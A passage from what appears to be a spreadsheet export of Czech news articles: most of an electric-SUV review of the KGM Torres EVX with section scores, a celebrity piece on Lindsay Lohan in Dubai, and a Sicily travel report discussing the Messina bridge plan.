silnici. Pokud bych měl vybrat nejkrásnější část vozidla, byla by to jednoznačně přední část, která nejvíce přesvědčí svou výraznou jistotou. Foto: Jan Macarol Zvláštní pochvalu si zaslouží designová filozofie „Powered by Toughness“, která sází na udržitelnost. Laskavost SUV -s jako Torres znamená, že stárnou pomaleji než jiné segmenty. Designéři KMG zjevně chtěli vytvořit design, který by obstál k rychlým výstřelkům automobilového průmyslu. Možná právě tato zdrženlivost používat trendy dává Torresovi jeho charakter. Další zajímavý detail: vozidlo nemá téměř žádné vystavené značky, což ještě více zdůrazňuje příběh jeho vlastního designu. Jediná věc, která je trochu matoucí, je „ Pokrýt ” na zádi, což vyvolává falešný dojem, že skrývá rezervní kolo. Nemá vlastně žádnou užitečnou funkci. Je to škoda, protože by se dal využít jako vhodné místo pro nabíjecí kabely nebo nějaké jiné užitečné příslušenství. Hodnocení exteriéru: 9/10 Design interiéru: příjemný, praktický, ale bez velkých překvapení Při hodnocení interiéru KMG Torres EVX musíme vycházet z toho, že jde o auto se základní cenou pod 30 000 eur. Interiér je proto třeba posuzovat s rezervou a vědomím, že jde o globální vozidlo, které musí splňovat velmi různorodé trhy a normy. To znamená, že uvnitř je spousta tvrdého plastu, který nepůsobí nejprestižněji. Ale přesto je díky dnešním nízkým očekáváním v této cenové kategorii celý zážitek více než přijatelný. Za více než 1 000 najetých kilometrů nám plast nevadil, ani nám nechyběly žádné zásadní doplňky. Vozidlo jasně odráží svůj účel – praktičnost a cenovou dostupnost. Kabina je navržena s ohledem na rodinnou použitelnost, s některými moderními prvky, jako jsou dvě plovoucí obrazovky připomínající obrazovky prémiových značek. Jediné, co mi zpočátku vadilo, je poněkud „náklaďákový“ vzhled volantu. Po pár kilometrech jsme si ale zvykli a funkčnost vynikne, jakmile se seznámíte s tlačítky. Foto: Jan Macarol Základní úroveň Explore zahrnuje látková sedadla, která jsou příjemná na dotek a slibují trvalou kvalitu. Design interiéru lze nejlépe popsat jako roztomilý – žádný luxus, ale funkční. Jednou zvláštností je absence klasických vypínačů; většina funkcí se ovládá přes dotykovou obrazovku, která působí modernisticky, i když by člověk uvítal nějaká tradičnější tlačítka pro rychlejší přístup. Praktičnost je in Pro Torrese EVX na velmi vysoké úrovni. Úložných prostorů je více než dost, včetně chytrých přihrádek na telefon a velké přihrádky na středové konzole. K dispozici je také několik portů USB-C, což je výhodné pro všechny cestovatele. Další příjemnou funkcí je přidání 12V zástrčky do kufru i do kabiny pro cestující. Z hlediska prostoru je vůz skutečným hitem - zadní sedadlo je neuvěřitelně prostorné a zavazadlový prostor s dalšími zásuvkami pod podlahou nabízí 839 litrů prostoru. Jediné, co nás zklamalo, je absence předního kufru (ti frunk), jelikož toto místo je věnováno elektromotoru. Foto: Jan Macarol Torres EVX je praktické a prostorné rodinné auto, ale interiér by mohl získat prestižnější vzhled některými plastovými vylepšeními. Plast, ač funkční, by po delším používání mohl jevit známky opotřebení, proto by mělo smysl jej chránit přídavnou fólií. Jinak interiér dobře dodržuje filozofii vozu – použitelnost a přístupnost bez přebytečného blesku. Hodnocení interiéru: 7,5/10 Infotainment elektromobilu: pokrývá základy, ale nenabízí konektivitu Ve světě elektromobilů je personalizovaný infotainment zásadní. Měla by být vaší pravou rukou při plánování tras, nabíjecích stanic a všeho ostatního. U Torres EVX se však zdá, jako by KMG tuto roli nechal na vás. Systém poskytuje základ – a to myslíme doslova. Plánování trasy pomocí vestavěného systému je hrubé a vestavěný seznam nabíjecích stanic je tak k ničemu, že jako by vám navigace radila: „Najdi si nabíjecí stanici, příteli, protože nejedu udělat to." Řešení? Google Maps přes Apple CarPlay nebo Android Auto, samozřejmě s kabelem. Bezdrátové připojení? sen. Přestože Mapy Google již nabízejí možnost nastavit si typ auta a přejít na elektromobil pro chytré plánování nabíjení, tato funkce bude v budoucnu ještě chytřejší – možná ještě chytřejší než vy, když budete na schůzce a budete se dívat pro nejbližší nabíjecí stanici. KMG si to ale zjevně uvědomuje, a tak nechali věci na základní úrovni. Opravdu věřím, že Google to udělá víc než kdokoli jiný. Také kvůli vývoji „informačního“ systému pro Volvo a Renault a některé další a věděli, co řidiči EV potřebují. Žádné připojení, žádné problémy, že? Aktualizace systému probíhají „analogicky“ – buď v servisním středisku přes USB klíčenku, nebo pokud máte cit pro techniku, můžete to udělat sami. Auto nemá aplikaci pro chytré telefony a také se nebude samo aktualizovat přes internet. To v přeneseném slova smyslu znamená, že nebudete moci na dálku vyhřívat sedadla ani interiér. A zkontrolujte stav baterie. Jakkoli to zní špatně, v praxi se používá poměrně zřídka. Stejně! V roce 2025 lidé očekávají, že budou moci pomocí svého telefonu zjistit, kde zaparkovali auto, vytopit ho nebo zkontrolovat stav baterie. Foto: Jan Macarol Pak je tu varování „šťastný svět“. Systém pro soustředění řidiče („Coffee Break“) se ozve po pár minutách jízdy, ačkoliv kávu chcete opravdu až po ujetí pár stovek kilometrů. Upozornění na překročení rychlosti? Hlasité, opakující se a tak nervózní, že by vás Jeremy Clarkson určitě poslal do hospody pro půllitr. Jinak se dá částečně umlčet, ale jen do dalšího spuštění. I jinak je Torres EVX extrémně „upovídaný“ – od hudebního pozdravu při nastartování až po příjemné zvukové zprávy po připojení k nabíjecí stanici. Pro ty, kteří mají rádi ticho, tohle není vaše auto. Zvukový projev audiosystému je někde mezi průměrem a přijatelným zvukem. Audiofilové budou přinejmenším zklamáni, ale za cenu auta budete muset své oblíbené písničky samozřejmě poslouchat s jistými kompromisy. Systém nabíjení baterií však nabízí světlé momenty – nabíjecí plán lze snadno nastavit, nabíjecí výkon lze omezit na 6 kW, což vám pomůže snížit náklady na rozvodnou síť. Bohužel zde není možnost ještě nižšího nastavení, což by prospělo i baterii. Infotainment systém KMG Torres EVX je zkrátka „v pořádku“, pokud jste příznivci jednoduchosti a máte přístup k externím řešením. Plánování trasy a správa baterie fungují, ale bez kouzelného doteku, který byste očekávali od roku 2025. Spousta prostoru pro zlepšení, ještě více prostoru pro vaše přizpůsobení. Ale zároveň může být tato jednoduchost i výhodou a „příležitostí“ pro budoucí vylepšení. V oblasti asistenčních systémů, jako je radarový tempomat, lane assist a pilot assist, se KMG Torres EVX řadí k průměru testovaných vozů. Radarový tempomat, i když není prediktivní, funguje hladce a nabízí řadu nastavení pro úpravu výkonu. Lane assist je trochu agresivní a vyžaduje určitou úpravu, zatímco pilot asistent „zajímavě“ často zasahuje ve směru jízdy, což se může zprvu zdát zvláštní, ale časem si zvyknete. Všechny systémy byly během testu nepřetržitě používány jak na dálnicích, tak na krajských silnicích. Systémy sice mohou postrádat prémiové finesy, jaké se vyskytují u dražších vozů, ale fungují spolehlivě a bez nepříjemných překvapení – což je u asistenčních systémů jistě důležité. Hodnocení informačního systému: 6,5/10 Asistenční systémy: 6,5/10 Elektromobil: v mezích známého, se zdravým rozumem Začněme se základy! KMG Torres EVX je poháněn elektromotorem, který na přední kola posílá 152 kW (207 k). To je schopno okamžitě vyvinout točivý moment 339 Nm, díky čemuž je vůz příjemně citlivý a překvapivě skákavý. Z 0 na 100 km/h zrychlí za slušných 8,1 s a maximální rychlost je 175 km/h. To pravé pro rodinné výlety, jízdu v rychlém pruhu a pro chvíle, kdy chcete zůstat o krok před řidičem za vámi – doslova a do písmene. Motoru a hnacímu ústrojí nelze mnoho vytknout; Odezva a možnosti nastavení (Eco, Comfort, Sport) demonstrují přizpůsobivost elektrického systému. Co je poněkud zklamáním, je absence pohonu všech čtyř kol. Na vůz, jehož exteriér vyzývá k dobrodružství v drsném terénu, je to opravdu zvláštní rozhodnutí. Takový drsný vzhled, žádná možnost 4×4? Je to jako když vám slíbí dobrodružný film a pak dostanete romantickou komedii. Taková verze by Torres EVX okamžitě zařadila na vrchol žebříčku elektrických SUV, ale zatím zůstává pouze kompaktním SUV s pohonem dvou kol. Foto: Jan Macarol Nabíjení a baterie; překvapivě konstantní Auto se nabíjí maximální rychlostí 120 kW, což není v roce 2024 zrovna působivé – zvláště ne s čistou kapacitou baterie 72 kWh. Ale překvapení! Nabíjecí křivka Torres EVX je překvapivě dobrá. I přes nižší maximální nabíjecí výkon je velmi konstantní a auto nabije baterii z 9 % na 80 % za pouhých 36 minut (při teplotě 8 °C - 2x opakované - reálný test nabíjení). Až 50 nabití % udržuje výkon nad 105 kW, což je více, než zvládá mnoho aut s papírově výkonnější specifikací. Výsledek? Dobrá nálada a méně čekání u nabíjecích stanic. Jinými slovy, solidní výsledek. Baterie BYD Blade instalovaná v Torres EVX je známá svou bezpečností a odolností. Že je to pravda, dokládá i působivá záruka – kapacita baterie 70 % po 1 000 000 najetých kilometrech nebo 10 letech. Je jasné, že KMG se zaměřilo na odolnost, i když část nabíjecí kapacity na „špičce“ baterie museli obětovat, aby se snížilo přehřívání. Usuzuji, že i proto zde není taková "maximální" kapacita nabíjení. Spotřeba energie: překvapení v rychlém pruhu Při našem testu na 1 100 kilometrů, který zahrnoval přibližně 80 jízd po dálnici %, 5 % městský provoz a 15 krajských silnic %, byla průměrná spotřeba 23,6 kWh na 100 km. Na dálnicích, kde jsme jeli mezi 120 a 150 km/h, Torres EVX prokázal, že na to má, i když mu chyběla DNA (aerodynamika) na úsporu energie. Při tomto stylu jízdy – bez „šnečích návyků“ – jsou výsledky solidní. Při normálnějším používání a mírně vyšších teplotách očekáváme spotřebu kolem 21,5 kWh na 100 km, což je na velké robustní SUV více než přijatelné. Nebo lépe než nějaké „žhavé“ menší elektromobily. Náš test probíhal při teplotách od 0 do 11 °C, což znamená, že jsme použili vytápění kabiny. Baterii jsme navíc před nabíjením záměrně vozili do téměř vybitého stavu, jelikož takový přístup odráží reálné využití vozu na dlouhých cestách. Auto jsme tedy opravdu vyzkoušeli, jako bychom řídili normální auto a ne elektrické. Foto: Jan Macarol Nějaká logika zdravého rozumu. KMG Torres EVX se nevyhýbá trendům v oboru, ale drží se osvědčených základů a přitom úspěšně udržuje rovnováhu mezi výkonem a hospodárností. S několika vylepšeními – především přidáním pohonu všech kol – by to byl skutečně všestranný hráč v segmentu elektrických SUV. Možná si to stále nechávají v KGM pro modernizace modelů. Elektromobil: 8,5/10 Nabíjení: 6/10 Spotřeba: 7,5 /10 Jízdní vlastnosti: žádné překvapení, ale ani excesy KMG Torres EVX neslibuje sportovní vzrušení ani adrenalinové zážitky, ale ani to není jeho účelem. Místo toho nabízí vyvážený a sebevědomý zážitek z jízdy, který v některých ohledech dokonce předčí očekávání od SUV této velikosti. Elektrický pohon a nízké těžiště vytvářejí pocit stability, kterého srovnatelné vozy se spalovacími motory často nedosáhnou. I kvůli rozložení hmotnosti, které je ideálnější. Naklánění v zatáčkách je minimální a podvozek účinně tlumí otřesy a zvuky, díky čemuž je řízení pohodlné a méně stresující. Podvozek je přitom tichý, bez „nekvalitních“ zvuků. Navzdory své velikosti a robustnímu vzhledu Torres EVX překvapí pocitem lehkosti. S hmotností něco málo přes 1900 kilogramů je na svou třídu poměrně lehký, což se pozitivně projevuje na ovladatelnosti. Některé části vozu jsou dokonce neuvěřitelně lehké – například rolování zavazadlového prostoru, které váží necelý kilogram. Volant je trochu moc velký a neposkytuje moc zpětné vazby od vozovky, ale to nijak nesnižuje požitek z jízdy, protože zůstává dostatečně přesný a snadno se ovládá. Jen vzhled vyžaduje určitou úpravu. Foto: Jan Macarol Elektromobily často zaujmou svou předvídatelností a vysokými prahy smyku a Torres EVX není výjimkou. Největší výzvou u těchto vozidel je nalezení hranice přilnavosti, protože bod prokluzu je nastaven velmi vysoko – v tomto voze tak vysoko, že jsme ho v testu nedosáhli. To vypovídá o vynikající konstrukci podvozku a bezpečné jízdní dynamice, která v řidiči vzbuzuje důvěru. Torres je pevně ukotven k vozovce, což v praxi znamená, že se při jízdě cítíte bezpečně a jistě, bez zbytečného strachu, že vůz ztratí kontrolu. See also Foto: Jan Macarol Schopnosti v terénu jsou lepší, než se očekávalo Se vzdáleností 17 centimetrů od země Torres EVX dokazuje, že umí víc než jen jízdu po městě. Na šotolině se chová sebevědomě a slibuje výkon, který přesahuje základní terénní požadavky. Podvozek je příjemný do terénu a auto je v takovém terénu velmi doma. Je více než vhodný pro výlety po horských stezkách a polních cestách. Je pravda, že on pohon všech čtyř kol chybí, což by z něj udělalo skutečného off-roadového elektrického šampiona, ale u většiny rodinných dobrodružství tento nedostatek nebude patrný. Nebudete mít problém vyrazit na víkendové výlety do Velika Planina nebo po udržovaných horských silnicích, kde Torres předčí očekávání. Torres EVX není sportovní vůz a ani se jím nesnaží. Místo toho nabízí jízdní vlastnosti šité na míru bezpečnosti, pohodlí a praktičnosti. Je suverénní na silnici a překvapivě schopný na šotolině, což z něj dělá jedno z vyváženějších elektrických SUV ve své cenové kategorii. Pokud hledáte vozidlo, které nabízí jednoduchý, předvídatelný a spolehlivý pohon, Torres EVX je bezpochyby tou správnou volbou. Pokud ale toužíte po sportovním charakteru nebo extrémních terénních schopnostech, možná budete muset hledat jinde. Jízdní vlastnosti: 7,5 /10 Kvalita sestavení a kvalita testování Když jsme vzali KMG Torres EVX k testování, měl na tachometru 6 800 kilometrů – dost na posouzení kvality sestavení a odolnosti proti opotřebení. První dojem? Zvenku bylo auto v solidním stavu, bez větších známek opotřebení. Jedinou výjimkou byly drobné škrábance na plastu v kufru, což se u rodinného SUV očekává. Ačkoli nejde o nic vážného, při bližším zkoumání vůz vykazuje některé nedostatky, které prozrazují, že jeho kvalita provedení neodpovídá evropským standardům. Foto: Jan Macarol Při bližším prozkoumání exteriéru jsme si všimli některých nesrovnalostí ve složení karoserie. Mezery mezi panely nebyly rovnoměrně zarovnané, což je patrné zejména kolem hran dveří a blatníků. Nanášení laku bylo navíc místy méně přesné, s mírným přeléváním přes okraje. Jsou to vizuální maličkosti, ale pro kupující, kteří ocení detaily, by mohly být otravné. Co se týče interiéru, vůz si zachoval funkčnost bez výraznějších známek opotřebení. Jedinou nepříjemností byly stěrače, které vykazovaly známky opotřebení již po 7000 kilometrech – na vůz, který měl slibovat dlouhodobou spolehlivost, poměrně brzy. Podvozek při prohlídce zaujal pevnou konstrukcí bez známek rzi, jen pár drobností naznačovalo kontakt s počasím. Během testu, který trval několik dní a zahrnoval různé povětrnostní a silniční podmínky, Torres EVX prošel testem bez větších problémů. Vozidlo fungovalo stabilně a bez poruch, s jedinou výjimkou – po čtyřech hodinách nepřetržité jízdy přestal fungovat Apple CarPlay. Tento problém se však druhý den vyřešil sám, bez nutnosti dalšího zásahu. Problém pravděpodobně souvisí se softwarem a ne s hardwarem auta. Kvalita sestavení KMG Torres EVX je kombinací solidní a průměrné. Exteriér odhaluje některé nedostatky v přesnosti sestavení, zatímco interiér a podvozek vykazují větší odolnost. Testovací zážitek byl většinou bezchybný, jen občasné drobné problémy, jako jsou stěrače a Apple CarPlay, poukazovaly na prostor pro zlepšení. Pokud jste ochotni přehlédnout pár drobných chyb, Torres EVX nabízí za svou cenu solidní vozidlo – ale sofistikovanost typická pro evropské produkty ještě není úplně ona. Kvalita sestavení: 7/10 Hodnota za peníze: Za ty peníze je těžké porazit KMG Torres EVX je ve své cenové kategorii těžko překonatelný. S vyvolávací cenou necelých 29 900 eur s odečtenou dotací (nebo jen 24 000 eur pro firmy po odpočtu DPH) nabízí prostorné elektrické SUV s dostatečně velkou baterií a spoustou užitečné výbavy, jako je radarový tempomat, jízdní pruh udržovací systém, automatická světla a couvací kamera. Se 7letou tovární zárukou a zárukou na baterii až 10 let nebo milion kilometrů je ideální volbou pro rodiny a taxislužby. Vzhledem ke svému výkonu, výbavě a nízkým nákladům má Torres EVX vynikající hodnotu za peníze. Hodnota za cenu: 9/10 Konečné celkové hodnocení a dojem: Vřele doporučuji KMG Torres EVX je vůz, který se drží osvědčeného vzorce nabídnout maximum za co nejméně peněz. Ale abych byl upřímný, má to i svou Achillovu patu. Největší z nich je odpojení. V roce 2024 jsou „Over-the-Air Updates“ v motoristickém světě téměř náboženstvím, ale Torres tuto funkci nemá. Zmate to běžného uživatele? Pravděpodobně ne, pokud nepatříte k lidem, kteří rádi mačkají tlačítko a doufají, že se auto zázračně naučí nové triky, jako je parkování bez řidičského oprávnění. V základní verzi nechybí ani vyhřívání sedadel – to znamená, že v zimě vás bude hřát jen síla elektromotoru a možná váš optimismus. Nyní k té světlejší stránce příběhu. Přestože jsou plasty uvnitř levné, základní verze Explore přesvědčí dostatkem výbavy a funkčnosti. Radar, asistent jízdního pruhu, couvací kamera – vše v ceně, žádné skryté doplňky. A to za cenu, která vám nezkazí náladu, i když si s nákupem vezmete i sadu zimních pneumatik. Tato verze je podle našeho názoru nejvíce doporučená. Pokud ale sáhnete po dražších verzích, dostanete stejné materiály (čti plast), ale také vyšší očekávání, která Torres ne vždy naplní, ale stávají se součástí dražšího balení. Torres EVX přesvědčí spolehlivostí na silnici, ale jeho největší předností je hodnota. Za necelých 30 000 eur nabízí prostornost, využitelnost a záruky, které vydrží déle než průměrná zamilovanost. Pokud jste firma, ještě více vás potěší možnost odpočtu DPH – 24 000 eur za SUV této velikosti je skutečně absurdně málo. (čti. hrubý) Ještě důležitější je, že Torres by měl dosáhnout 5 hvězdiček v testech NCAP. Proč jsme si tak jisti? KMG se v poslední době snaží vystoupit ze stínu těch „nízkých“ a na bezpečnosti nešetří. Některé jejich vozy byly nedávno oceněny 5 hvězdičkami. Pokud bude výsledek horší, snížíme odpovídajícím způsobem hodnocení. Nyní se dostáváme k závěru: 9/10, protože za svou cenu je Torres EVX zázrak, který nelze ignorovat – i když jeho nedostatek konektivity v roce 2024 působí jako volání z minulosti. Jednoduše si to pragmaticky přehoďte přes rameno. Foto: Jan Macarol Celkový počet bodů: 75 bodů / 100 bodů Závěr: Takže KMG Torres EVX je jako ten kamarád, který možná nenosí nejdražší oblečení, ale vždy přinese na párty pivo a je první, kdo vám pomůže přesunout pohovku do třetího patra bez výtahu. Není to dokonalé – vnitřní plasty si zaslouží méně posměchu, Apple CarPlay má špatný den častěji než vy a v dohledu není žádný pohon 4x4. Ale za cenu pod 30 000 eur? Získáte elektrické SUV, které vás nezklame dlouho poté, co to ostatní vzdali. Pokud hledáte auto, které umí přemýšlet s farmářskou logikou a držet se svého terénu, pak jste ho našli. Jednoduše řečeno: zdravý rozum na čtyřech kolech. LEAS – Majitelé elektromobilů ve Slovinsku Jste novým majitelem elektromobilu?! Láká vás nebo jen zajímá e-mobilita? Přemýšlíte o koupi nového elektromobilu? Pak se přidejte do FB skupiny LEAS a čtěte a sdílejte informace o e-mobilitě. Společně vytváříme největší komunitu majitelů elektromobilů! Autor: Jan Macarol Autor person Jan Macarol Rubrika transition_slide Električna mobilnost</t>
  </si>
  <si>
    <t>33.23</t>
  </si>
  <si>
    <t>20241201_250_3474985574_9a95169f9810415a0c64.html</t>
  </si>
  <si>
    <t>9a95169f9810415a0c64</t>
  </si>
  <si>
    <t>Herečka Lindsay Lohan (38) vyměnila Hollywood za Dubaj. Jaký rituál provádí se svým ročním synem každé ráno?</t>
  </si>
  <si>
    <t>Herečka Lindsay Lohan (38) vyměnila Hollywood za Dubaj . Jaký rituál provádí se svým ročním synem každé ráno? 16 FOTOGRAFIÍ zobrazit galerii Z drsné rebelky něžnou mámou. Tak by se dal v kostce shrnout život americké herečky, která se svou rodinou sice žije ve městu luxusu, ale bez pozornosti médií. Té si totiž užila až až. Na co je Lindsay jako máma nejpyšnější? A má v plánu další dítě? [Odebírejte NOVINKY Z MAMINKY! Chci newsletter! ] Lindsay si pro porod prvorozeného syna nevybrala žádnou z amerických luxusních nemocnic, s manželem Baderem malého Luaie přivítali na svět loni v létě v Dubaji , kde rodina momentálně žije. Herečka po porodu vzdala hold svému tělu prostřednictvím fotografie na Instagramu, kde obvykle sdílí superdokonalé fotografie či videa z reklamních kampaní. „J sem tak pyšná na to, co všechno toto tělo dokázalo během těhotenství a taky nyní, kdy se zotavuje. Mít dítě je největší radost na světě…“ VIDEO: CELEBRITY, KTERÉ NEUNESLY SVOU SLÁVU Pyšná je pro změnu na Lindsay její mladší sestra Aliana. „Moje sestra je jedna z nejstarostlivějších, nejlaskavějších, nejskromnějších a nejtalentovanějších lidí. Je to rozená máma. Tolik ji miluji a opravdu k ní vzhlížím.“ Herečka dala před životem v Hollywoodu přednost zemi s naprosto odlišnou mentalitou. Syn Luai tak vyrůstá v úplně jiném prostředí než jeho slavná máma. „ Dubaj mi dává prostor mít vlastní vizi toho, co musím dělat dál. I když je to rušné město, život tady je klidnější. Nemám tu tolik pozornosti veřejnosti a necítím tak velký tlak jako v Americe . Tady můžu svému synovi zajistit stabilitu a klid, který mně v dětství tolik chyběl,“ narážela herečka na svou kariéru od útlého dětství, která byla protknutá i drogami a alkoholem . Jedinou nevýhodou je podle ní odloučení od zbytku rodiny, ta se však herečku snaží pravidelně navštěvovat. I když Lindsay přiznává, že některé dny jsou jako přes kopírák, svého rozhodnutí nelituje. Našla si i jeden společný rituál se svým synem, který pilně dodržuje. „Od doby, co se Luai narodil, ho každé ráno, když se vzbudí, vyfotím. Nemůžu si to prostě nechat ujít. Nedávno jsem o tom mluvila se svým mužem a ten se mě ptal, jestli vím, že už máme tisíce fotek. Chtěl vědět, jestli bych to samé dělala, kdybychom měli další dítě. No, to už je jiný příběh,“ řekla tak trochu vyhýbavě Lindsay v rozhovoru pro magazín Today. Kdo ví, třeba už je druhý potomek „na cestě“… Tradice Zdroj: Profimedia/Instagram/ Zdroj: Profimedia Zdroj: Instagram/ Zdroj:Instagram/ Autor: Veronika Matoušková Autor person Ivana Štědrá</t>
  </si>
  <si>
    <t>10240</t>
  </si>
  <si>
    <t>20241201_251_3474970053_3bb830e59cdad14d4738.html</t>
  </si>
  <si>
    <t>3bb830e59cdad14d4738</t>
  </si>
  <si>
    <t>Cestování po Sicílii. Město Cefalú je plné života, přírodní skvosty táhnou</t>
  </si>
  <si>
    <t>Cestování po Sicílii . Město Cefalú je plné života, přírodní skvosty táhnou Zbývá nám zde zakončit náš poznávací program. Dnes je na programu návštěva soutěsky řeky Alcantara . Už to jméno sem na největší italský ostrov nějak nepasuje, že. Soutěska se nachází na dolním toku této řeky, jejíž jméno vzniklo (když to tady ovládali Maurové) z arabského výrazu al-Qantarah, což znamená most. Stěny tvoří hranolovité čedičové útvary, až 50 m vysoké. Procházíme po naučné stezce nad soutěskou, s výborným výhledem dolů na řeku a soutěsku s možností fotografování (viz foto). Výtahem sjíždíme dolů, kde řeka vytéká ze skal. play_fill Zprávy Tam se lidé sluní, odpočívají, obdivují okolí, či vyrážejí na lehko jen bosi či v nepromokavé obuvi vodou proti proudu řeky do zužující se soutěsky. Jsou zde mj. připraveny na věšácích i vysoké „rybářské“ holínky až vysoko nad pas, jež slouží k možnému „hydrotrekingu“ přímo korytem řeky, kde má místy i větší hloubku. Voda v řece je křišťálově čistá, chladivá, osvěžující. Jediným záporem je poměrně vysoká cena vstupného do této přírodní atrakce, čemuž se podivují i movití Angličané. V turistickém parku roste i mnoho zajímavých rostlin – je to v podstatě i malá botanická zahrada v přírodě. Po zhlédnutí pokračujeme dál ke krásnému městu Cefalú. Ústecko Letovisko Cefalú na severním pobřeží Sicílie s 13 000 obyvatel (v létě samozřejmě daleko více) bylo naším posledním místem pobytu na Sicílii . Jeho důležitost spočívá spíše v tom, co může svým návštěvníkům nabídnout. A toho je přehršle. Především krásná poloha na břehu moře s krásnými a udržovanými kilometry pláží. Dále krásné prostředí, ve kterém leží i jeho okolí. Město se nachází pod vysokou skálou, na které kdysi stával antický chrám. Dnes je ve městě Dóm, který nechal postavit normanský (vždyť Normané tu vládli přes dvě stě let !) král Roger II. V Dómu je pak úchvatná mozaika. La Rocca Dóm představuje nejdůležitější památku celého města. Od roku 1131 měl být původně královskou hrobkou a hlavním chrámem Sicilského království. To se sice nestalo, nicméně byl dokončen a stal se jednou ze skutečně slavných staveb jižní Itálie . Dóm zlatavé barvy, drahokam románského stavitelství, stojí za palmovou „hradbou“ a jeho pozadí tvoří mohutná skála La Rocca. Průčelí lemují dvě věže a mezi nimi se nachází hlavní portál Porta dei Rei – královská brána. Když návštěvník vstoupí dovnitř, ohromí ho vnitřní výzdoba zlatých mozaik. Jedná se o dílo byzantských mistrů. S něčím podobným se lze setkat pouze v Monreale, kde je ještě rozsáhlejší mozaiková výzdoba. Zde je nejznámější a nejúchvatnější mozaikou ta v apsidě (závěru) kostela. Je jí Kristus Pantokrator (Kristus Vševládce). close info Zdroj: se souhlasem Ervína Dostálka zoom_in Cestování po Sicílii . Cefalú je krásné město plné života, naplněné letními návštěvníky. Jeho prostředí, uličky, bezpečná pláž a vlnící se moře. Pobyli jsme zde asi tři hodiny. A pak už jen suvenýry, láhev vína Corleone , Palermo , noční trajekt do Neapole a hurá domů do Země České se zážitky ze světa uprostřed Středomoří, z největšího jeho ostrova i největší italské provincie s památkami východních i západních kultur: Řeků, Arabů, Normanů i Římanů, s nádhernou přírodou i mořem a nejvyšší sopkou Evropy . Most jako pokrok Plujeme trajektem do Neapole , tak jako na začátku obráceně sem. Mohli jsme zpět na pevninu přes most? Zatím ne, a jaký? Myšlenka spojit mostní konstrukcí středomořský ostrov Sicílii s Apeninským poloostrovem napadla už staré Římany. S pokrokem stavebních technologií se i most mezi Skyllou a Charybdou může stát skutečností. Měl být vrcholným dílem novodobého mostního stavitelství. Dnes se stoupenci někdejšího antického snu opírají o tvrzení, že most přes divokou úžinu by vedl nejen k prostému spojení pevniny a ostrova, ale také by výrazně přispěl k vyřešení chronických hospodářských problémů chudé jižní Itálie . Oponenti naopak tvrdí, že jde o čiré bláznovství a že se velikášskému projektu věnuje více pozornosti, než by si zasloužil. Zprávy Stoupenci i protivníci mostu na obou stranách úžiny, kam Homér umístil bájné netvory Skyllu a Charybdu, kterých se obával Odysseus, vyvolával vzrušené politické diskuse. "Ono pozemské místo vypadá jako scéna z Michelangelových fresek na stropě Sixtinské kaple. Prst Boha a prst Adama se téměř dotýkají, aniž by se spojily. Postavit tam most by znamenalo skutečnou katastrofu, svatokrádež," míní Giuseppe Restifo z messinské pobočky strany Zelených, která se rozhodně staví proti mostu. Avšak to, co pro jednoho znamená svatokrádež, může pro druhého zosobňovat totéž co pokrok. K přemostění úžiny se rozpoutala před časem bouřlivá debata. Na jedné straně stály finančně zdatné společnosti, které už do podpory projektu vložily kolem 80 miliónů dolarů. Ústecko Jejich tlaku čelila hrstka lokálních patriotů z řad Zelených, kteří prohlašují, že peníze mohly být vynaloženy mnohem účinněji. Pro představu je dobré připomenout, že železniční tunel pod Lamanšským průlivem přišel na zhruba 8,5 miliardy dolarů. Stoupenci pevného spojení přes Messinskou úžinu také argumentují tím, že most podstatně přispěje k ekonomickému oživení a ke zvýšení turistické návštěvnosti v jižní Itálii , stejně jako na Sicílii , což by významně podpořilo tamní ekonomiku. Ale vyžádalo by si to další 2,1 miliardy dolarů, které by zatížily italský státní rozpočet. Ekologičtí aktivisté však připomínají, že jakmile by stavba mostu skončila, o práci by přišly stovky lidí. Podle dosavadních odhadů by po osm let nacházelo na stavbě práci kolem deseti tisíc lidí. Po dokončení díla by pak mělo přetrvat kolem jednoho tisíce stabilních pracovních míst souvisejících s údržbou mostu a obslužné infrastruktury. Golden Gate Bridge Most , k němuž řada mezinárodních stavebních inženýrů a architektů vzhlížela s respektem, by se honosil nejdelší vozovkou na světě zavěšenou mezi dvěma věžemi. Vzdálenost mezi dvěma mostními pilíři by činila 3,3 kilometru, což je o 1400 metrů víc, než měří dosud pravděpodobně nejdelší centrální mostní pole v japonském Akaši Kaikjó, a třikrát víc než proslulý Golden Gate Bridge v San Francisku . Mostovka by měla mít šířku 60 metrů, což by umožnilo vybudovat dvanáct dopravních pruhů pro osobní automobily, nákladní auta a vlaky. Věže by pak strměly do 376 metrů nad mořskou hladinou, což zhruba odpovídá výšce newyorských mrakodrapů Světového obchodního střediska. Hmotnost mostu včetně lan by činila asi 300 tisíc tun. Závěsná lana položená na sebe by svou délkou pětkrát obtočila zeměkouli. Přeprava z pevninské Itálie by na ostrov Sicílii trvala pouhé tři minuty, zatímco dosud cesta na palubě trajektu vyžaduje nejméně 25 minut, přičemž přeprava automobilů a vlakových souprav se citelně prodlužuje. Přeprava kromě toho trvá déle také v letních špičkách podmíněných značným náporem turistů. Podle představ projektantů by se přes Messinský most mohlo každou hodinu přepravit devět tisíc automobilů a denně by tam projelo 200 vlaků. Simulace společnosti Stretto di Messina prokázaly, že mostní konstrukce by odolala zemětřesení 7,1 stupně Richterovy škály, pokud by se epicentrum nacházelo 15 kilometrů od mostu. V roce 1908 zničilo Messinu na sicilské straně právě zemětřesení o síle 7,1 stupně, přičemž o život přišlo 87 tisíc lidí. Stavba by měla odolávat i náporu větru o rychlosti 223 km/h, což asi dvojnásobně překonává rychlosti v tamním regionu zaznamenané. Projektanti mimo to tvrdí, že most by odolal i pumovému útoku či katastrofě s přetržením nosných lan. Tak takovéto plány byly ještě na přelomu tisíciletí. Dnes akce – most u Messiny asi usnula. A my odjíždíme na pevninu trajektem do Neapole , tak, jak jsme se na Sicílii před více než týdnem dostali. Ervín Dostálek, bývalý učitel a cestovatel Krimi Autor: Čtenář reportér</t>
  </si>
  <si>
    <t>716110</t>
  </si>
  <si>
    <t>740430</t>
  </si>
  <si>
    <t>20241201_252_3474945311_0e116620f20d64767a7b.html</t>
  </si>
  <si>
    <t>0e116620f20d64767a7b</t>
  </si>
  <si>
    <t>Hana (62): Děti nám zaplatily all inclusive dovolenou. Byla to největší chyba a horor!</t>
  </si>
  <si>
